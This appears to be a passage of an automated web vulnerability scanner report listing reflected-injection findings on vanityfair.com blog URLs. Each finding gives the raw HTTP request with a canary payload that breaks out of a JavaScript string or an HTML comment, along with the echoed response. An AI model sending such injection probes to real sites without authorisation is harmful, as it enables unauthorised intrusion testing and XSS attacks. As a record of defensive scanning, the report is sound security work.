Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:46 GMT
Date: Mon, 29 Nov 2010 16:49:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
se bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[888772653]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11b7360-->c91f9ff0b94/it-saddens-me-to-think.html?proxyuri=online%2Fwolcott%2F2010%2F11b7360--%3Ec91f9ff0b94%2Fit-saddens-me-to-think.html':
escaped absolute path not valid.
->
...[SNIP]...

1.240. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/it-saddens-me-to-think.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae468'%3bd9a2d6b8010 was submitted in the REST URL parameter 4. This input was echoed as ae468';d9a2d6b8010 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/11ae468'%3bd9a2d6b8010/it-saddens-me-to-think.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:43 GMT
Date: Mon, 29 Nov 2010 16:49:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/11ae468';d9a2d6b8010/it-saddens-me-to-think.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally
...[SNIP]...

1.241. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/it-saddens-me-to-think.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5e13'%3bec9601eadeb was submitted in the REST URL parameter 5. This input was echoed as a5e13';ec9601eadeb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/11/it-saddens-me-to-think.htmla5e13'%3bec9601eadeb HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:01 GMT
Date: Mon, 29 Nov 2010 16:50:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.htmla5e13';ec9601eadeb',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.242. http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/it-saddens-me-to-think.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 85f94-->544613232cd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/11/it-saddens-me-to-think.html85f94-->544613232cd HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:03 GMT
Date: Mon, 29 Nov 2010 16:50:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80321


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
mons.exceptions.ApplicationBug:
-:[997866762]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.html85f94-->544613232cd?proxyuri=online%2Fwolcott%2F2010%2F11%2Fit-saddens-me-to-think.html85f94--%3E544613232cd':
escaped absolute path not valid.
->
...[SNIP]...

1.243. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 62c06-->504ead418a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/201062c06-->504ead418a4/11/the-everyday-poetry-of-married-life.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:11 GMT
Date: Mon, 29 Nov 2010 16:50:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80462


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1940082476]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/201062c06-->504ead418a4/11/the-everyday-poetry-of-married-life.html?proxyuri=online%2Fwolcott%2F201062c06--%3E504ead418a4%2F11%2Fthe-everyday-poetry-of-married-life.html':
escaped absolute path not valid.
->
...[SNIP]...

1.244. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dddfe'%3b22b93f180db was submitted in the REST URL parameter 3. This input was echoed as dddfe';22b93f180db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010dddfe'%3b22b93f180db/11/the-everyday-poetry-of-married-life.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:08 GMT
Date: Mon, 29 Nov 2010 16:50:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77420


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010dddfe';22b93f180db/11/the-everyday-poetry-of-married-life.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular d
...[SNIP]...

1.245. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 88126-->8d41650cb0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/1188126-->8d41650cb0/the-everyday-poetry-of-married-life.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:25 GMT
Date: Mon, 29 Nov 2010 16:50:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
e bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1388339606]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/1188126-->8d41650cb0/the-everyday-poetry-of-married-life.html?proxyuri=online%2Fwolcott%2F2010%2F1188126--%3E8d41650cb0%2Fthe-everyday-poetry-of-married-life.html':
escaped absolute path not valid.
->
...[SNIP]...

1.246. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f86'%3b66964d221cb was submitted in the REST URL parameter 4. This input was echoed as b6f86';66964d221cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/11b6f86'%3b66964d221cb/the-everyday-poetry-of-married-life.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:22 GMT
Date: Mon, 29 Nov 2010 16:50:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77420


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/11b6f86';66964d221cb/the-everyday-poetry-of-married-life.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dial
...[SNIP]...

1.247. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da196'%3b8d1c84dd76 was submitted in the REST URL parameter 5. This input was echoed as da196';8d1c84dd76 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/wolcott/2010/11/the-everyday-poetry-of-married-life.htmlda196'%3b8d1c84dd76 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:34 GMT
Date: Mon, 29 Nov 2010 16:50:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77417


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.htmlda196';8d1c84dd76',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.248. http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 2955d-->a4daf63d781 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html2955d-->a4daf63d781 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 17:00:35 GMT
Date: Mon, 29 Nov 2010 16:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80464


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
s.ApplicationBug:
-:[1374523063]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.html2955d-->a4daf63d781?proxyuri=online%2Fwolcott%2F2010%2F11%2Fthe-everyday-poetry-of-married-life.html2955d--%3Ea4daf63d781':
escaped absolute path not valid.
->
...[SNIP]...

1.249. http://www.vanityfair.com/online/wolcott/2010/11/trust-but-verify-a-talking.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/wolcott/2010/11/trust-but-verify-a-talking.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload eadf6-->8d3012b5ea4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/wolcott/2010eadf6-->8d3012b5ea4/11/trust-but-verify-a-talking.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
